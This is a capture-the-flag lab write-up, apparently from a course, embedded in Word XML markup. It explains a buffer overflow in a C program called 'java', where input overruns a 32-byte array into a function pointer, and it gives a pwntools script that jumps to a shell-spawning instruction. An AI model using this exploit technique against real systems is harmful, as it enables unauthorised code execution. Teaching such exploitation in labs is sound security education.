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400177001953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PWN 2: Java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40" w:lineRule="auto"/>
        <w:ind w:left="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interacts with several functions and uses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731.280059814453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struct programmer_t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34.640045166015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455.59997558593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char favourite_lang[32];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461.11999511718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void (*call)();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02.2399902343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programmer_t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3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favourite_lang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32-byte array;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3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function pointer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24.48005676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we can interact with the program with the following instructions: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740.879974365234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while ((c = getchar()) != '\n')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57.279968261718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user.favourite_lang[i++] = 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7.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="9.600067138671875" w:right="17.37060546875" w:hanging="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getchar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each character of the input we provide (until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 is copied into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favourite_lang array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an instance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programmer_t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 This code contains the vulnerability we can exploit to solve the exercise.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10.800018310546875" w:right="6.4062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goal to open a shell and capture the flag located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Only one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allows us to achieve this aim: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741.11999511718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void bash()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34.640045166015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printf("Opening bash shell...\n");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51.2799072265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sleep(3);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printf("are you sure you don't prefer java?\n");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49.360046386718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if(rand() != 328347) return;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30.1599121093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if only there was a way to jump here...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454.639892578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execlp("/bin/sh", "/bin/sh", NULL);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02.2399902343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7.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="5.0400543212890625" w:right="2.919921875" w:hanging="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need to reach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execlp("/bin/sh", "/bin/sh", NULL);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 but, considering the program flow, it’s impossible to pass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However, we could try to retrieve the memory address of the instruction we are interested in by using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gdb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debugger (first, open the debugger as explained in the previous solution):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gdb disas bash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5141372680664" w:lineRule="auto"/>
        <w:ind w:left="38.2537841796875" w:right="1.66748046875"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6334125" cy="3990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4125" cy="3990975"/>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Illustration 1: Bash assembly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2.8800201416015625" w:right="28.30078125" w:firstLine="10.080032348632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we are super expert of assembly, we can think that the instruction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we are looking for and that we could try to jump to the next instruction, located at “0x00000000004007a2”.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17.520065307617188" w:right="0"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Still, we do not know how we can jump there. By analyzing the execution, we can see that the last operation of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0" w:right="3476.640625"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if(user.call) user.call();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7.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="9.600067138671875" w:right="23.43017578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That’s great! Our entry point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user.favourit_lang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located right next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user.call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Our stack should looks like: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3174.92126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return address (8 bytes)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3401.48071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 pointer (8 bytes)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60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user.call (8 bytes)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776.281127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user.favourit_lang (32 bytes)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37.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="30.240020751953125" w:right="1.0595703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we still need to be aware that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if-else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 the variable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user.call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overwritten … but not always.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 doesn’t do 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95361328125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5.04005432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all the ingredients to write the Python script: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732.960052490234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from pwn import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59997558593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target_address = p64(0x4007a2)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28.399963378906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garbage = b'java' + b'a'*28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30.080108642578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msgin = garbage + target_address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 process('./java')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p.sendline(msgin)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20" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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p.interactive()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37.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="10.800018310546875" w:right="0.703125" w:firstLine="13.680038452148438"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that we are sending the msg using bytes (with syntax b’string’), since in python3 pwntools works better with bytes and might encounter problems if using strings. To encode a string to bytes, you can also use the function  (“str”).encode(‘ascii’)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37.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="10.800018310546875" w:right="0.703125" w:firstLine="13.68003845214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run the Python script, you should see a shell where you can launch bash commands (Figure 2). Note that in this case, we use the process in interactive mode to send commands and receive output from the program at runtime. This is very useful and common when the exercise involves the opening of a shell.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46484375" w:line="202.6586151123047" w:lineRule="auto"/>
        <w:ind w:left="15.839996337890625" w:right="1.66748046875" w:firstLine="22.413787841796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334125" cy="20859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4125" cy="2085975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:draw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Illustration 2: solution</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1545" w:top="1125" w:left="1131.7462158203125" w:right="1093.332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